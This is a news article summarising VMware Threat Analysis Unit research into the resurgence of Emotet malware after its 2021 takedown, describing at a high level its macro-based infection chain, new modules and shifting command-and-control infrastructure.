VMware Research Uncovers Evolving Nature of Emotet Malware

In January 2021, coordinated by Europol and Eurojust, law enforcement authorities from the Netherlands, Germany, the United States, the United Kingdom, France, Lithuania, Canada and Ukraine collaborated on one of the most dramatic botnet disruptions to date. Law enforcement managed to commandeer control of a massive botnet and redirect infected victims to a safer infrastructure.

Since its discovery in 2014, Emotet reigned as one of the most resilient pieces of malware ever created. Emotet first became known as a Trojan used to steal banking credentials. Once persistence was gained on a targeted endpoint, access to these systems was then sold to other criminal groups.

“The infrastructure that was used by Emotet involved several hundred servers located across the world, all of these having different functionalities in order to manage the computers of the infected victims, to spread to new ones, to serve other criminal groups, and to ultimately make the network more resilient against takedown attempts,” Europol wrote in an announcement about the takedown. But as big as the takedown was, it wouldn’t be the last we saw of Emotet.

Earlier this year, the VMware Threat Analysis Unit observed waves of new Emotet attacks in its threat intelligence cloud, VMware Contexa. Threat researchers studied its new infection mechanisms, mapped the threat’s command-and-control (C2) infrastructure and analyzed the components delivered by the latest Emotet version.

By analyzing Emotet’s software development life cycle, VMware observed how quickly its C2 infrastructure could be changed and discovered how it obfuscates its configuration, adapts and tests evasive execution chains, deploys different attack vectors at different stages, laterally propagates and continues to evolve.

“To map the evolution of the Emotet threat, VMware Threat Analysis Unit created an analysis pipeline that continuously analyzed the new samples observed in their telemetry and extracted the command and control configuration. The researchers used a modified Emotet sample to connect to the command-and-control endpoints and obtain updates,” said Chad Skipper, global security technologist at VMware, during a presentation detailing the research.

The pattern of attacks examined by VMWare’s team are fairly well-known, at this point. An email delivers Microsoft documents laced with macros that, when executed by the targeted victim, launch PowerShell commands and download the payload. Then, Emotet will download further malware such as TrickBot and QakBot.

Notable observations from the research include:

  • Emotet attack patterns are in continuous evolution: Based on a new similarity metric, the VMware Threat Analysis Unit’s clustering analysis identified various stages of attacks with several initial infection waves that change how the malware is delivered. The ongoing adaptation of Emotet’s execution chain is one reason the malware has been successful for so long. As part of this report, Emotet’s execution chains are characterized, infection techniques are explored and the evolution of the tactics, techniques and procedures are illustrated to help identify them in an environment.
  • Emotet can serve a number of attack objectives: The VMware Threat Analysis Unit intercepted two newly updated modules: The first targets Google Chrome browsers to steal credit card information and the second leverages the SMB protocol to spread laterally. These examples demonstrate just how expansive Emotet attacks can be.
  • Emotet authors are hiding their command-and-control infrastructure: The actors behind Emotet go to great lengths to make the information about the malware’s command-and-control infrastructure difficult to extract. The VMware Threat Analysis Unit developed a tool to bypass the anti-analysis techniques and the report shares how to extract the IP addresses and ports of the command-and-control servers from Emotet’s samples to understand the attack’s infrastructure.
  • Emotet’s infrastructure is constantly shifting: By analyzing the network endpoints involved in the command-and-control infrastructure, the VMware Threat Analysis Unit could track and document the botnets’ evolution.

The VMware report provides a more detailed look into the findings, including the inner workings of Emotet and its exploitation chains, including network indicators of compromise.